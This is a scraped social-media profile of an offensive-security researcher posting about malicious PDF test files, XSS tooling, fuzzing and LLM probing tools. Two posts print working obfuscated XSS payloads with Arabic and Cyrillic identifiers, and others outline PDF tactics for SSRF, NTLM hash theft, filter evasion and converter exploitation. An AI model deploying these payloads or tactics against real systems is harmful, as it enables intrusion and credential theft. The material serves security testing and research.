ɐpnH

299 posts

ɐpnH banner
ɐpnH

ɐpnH

@0x0Huda

Offensive Security | Python, Rust & C++ Interested in Complex Adaptive Systems and technical research.

RUH Katılım Ocak 2015
193 Takip Edilen643 Takipçiler
Sabitlenmiş Tweet
ɐpnH
ɐpnH@0x0Huda·
it's just me, myself and I 💅🏻🎸
English
0
3
7
2.3K
ɐpnH
ɐpnH@0x0Huda·
👾 Generate malicious PDF test files for assessing document parsing pipelines against phone-home callbacks, SSRF, XSS, NTLM credential theft, and data exfiltration. Designed for red teaming, bug bounty hunting, and hardening PDF viewers, converters, and web upload endpoints. Integrates seamlessly with Interact[.]sh or Burp Collaborator. 🔗 Repository: github.com/jonaslejon/mal…
English
3
23
100
5.9K
ɐpnH
ɐpnH@0x0Huda·
A wonderful platform the definitive repository for malware samples, source code, papers, builders & analysis resources. Massive, well-organized collection covering Windows, Linux, macOS and more. VX-Underground.org
English
0
1
6
460
ɐpnH
ɐpnH@0x0Huda·
Depends on the context. Georgian characters are valid JavaScript identifiers, so they can sometimes be used in XSS payload construction or obfuscation. Example: Actual viability depends on the reflection point, sanitization, encoding, and browser behavior.
English
0
1
10
980
ɐpnH retweetledi
ɐpnH
ɐpnH@0x0Huda·
AFL++ remains a core fuzzing engine for vulnerability research. Coverage-guided fuzzing is still a primary method for finding memory corruption in real targets. github.com/AFLplusplus/AF…
English
1
7
42
7.7K
ɐpnH retweetledi
ɐpnH
ɐpnH@0x0Huda·
it's just me, myself and I 💅🏻🎸
English
0
3
7
2.3K
ɐpnH
ɐpnH@0x0Huda·
XSS Payload Written In Arabic 🇸🇦 ``` ا='',ب=!ا+ا,ت=!ب+ا,ث=ا+{},ج=ب[ا++],ح=ب[خ=ا], د=++خ+ا,ذ=ث[خ+د],ب[ذ+=ث[ا]+(ب.ت+ث)[ا]+ت[د]+ج+ح+ب[خ]+ذ+ج+ث[ا]+ح][ذ](ت[ا]+ت[خ]+ب[د]+ح+ج+"(1)")() ``` XSS Payload Written in Russian 🇷🇺 ``` а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а], з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('взломано')")()
6
25
266
18.1K
ɐpnH
ɐpnH@0x0Huda·
Scared to be lonely 🎼
English
0
14
7
1.4K
ɐpnH retweetledi
ɐpnH
ɐpnH@0x0Huda·
RAMPART brings agent security testing into CI. Abuse scenarios become regression tests. Worth a look. Source: microsoft.com/en-us/security…
English
0
4
8
9.9K
ɐpnH retweetledi
ɐpnH
ɐpnH@0x0Huda·
All-in-one XSS toolkit: payload generator, scanner, and dork finder.
ɐpnH tweet mediaɐpnH tweet media
English
1
11
40
4.1K
ɐpnH retweetledi
ɐpnH
ɐpnH@0x0Huda·
Garak is used for probing failure modes in LLM systems (prompt injection, leakage, unsafe outputs). It represents the shift of vuln research toward AI system attack surfaces. github.com/NVIDIA/garak
English
1
9
41
5.1K
ɐpnH
ɐpnH@0x0Huda·
ServiceNow warned that unknown threat actors had exploited a vulnerability to gain deeper unauthorized access to vulnerable instances in a security incident. that allowed unauthorized access to client instances. The root cause of the issue was lack of enforcement of authentication and authorization in a ServiceNow API endpoint. Potentially, intruders could make unsolicited requests, and even access data from exposed database tables that were supposed to be accessible only by authorized users. thehackernews.com/2026/06/servic…
English
0
2
6
566
ɐpnH
ɐpnH@0x0Huda·
@I0xxOI كيف حالك ؟! يب XFA + encrypted JS can enable Acrobat RCE on versions before 26.001.21411. ☺️برسلك a prototype
Català
0
0
4
59
FAHAD 𖡬 ⃤⃒
@0x0Huda Superb 😉 Tried blending? PP (CVE-2026-34621) via XFA/form fields for SE + RCE?
English
1
0
5
81
ɐpnH
ɐpnH@0x0Huda·
↳ Attack the Server-Side Converters If your target converts uploaded PDFs to images or text (e.g., PDFBox, ImageMagick, Apache Tika), throw polyglot payloads at it (like SVG-MSL or XXE in XMP metadata). A simple document conversion pipeline can quickly escalate to arbitrary file read or RCE. ↳ Exploit Embedded Content & Font Engines Test modern PDF viewers by embedding HTML via catalog dictionaries (⁠/AF⁠ + ⁠/EF⁠) or leveraging font matrix injections (e.g., Type1 font breakouts). Verify that your processing sandboxes strictly restrict font rendering engines and external stream fetching. ↳ Automate and Validate Continuously Integrate mal-PDF generation into your automated scanner or CI/CD pipeline. If an uploaded document "phones home" or exfiltrates local environment variables, your parser isolation is failing. Build, test, and lock it down.
English
0
1
5
2.3K
ɐpnH
ɐpnH@0x0Huda·
Some Actionable Tactics for PDF Security Testing ↳ Test for Out-of-Band (OOB) Interactions Always drop PDFs containing ⁠/URI⁠ actions, GoToE UNC paths, or remote XFA templates. Use Interact[.]sh or Burp Collaborator to catch blind SSRF or silent NTLM hash leaking the moment the parser touches or renders the document. ↳ Bypass Naive Regex Filters Stop relying on basic string checks for ⁠/JS⁠ or ⁠/JavaScript⁠. Attackers stage payloads inside form fields (⁠/V⁠) or use multi-layered obfuscation like FlateDecode compression. Ensure your security tools can unpack and analyze staged streams.
English
1
1
5
1.9K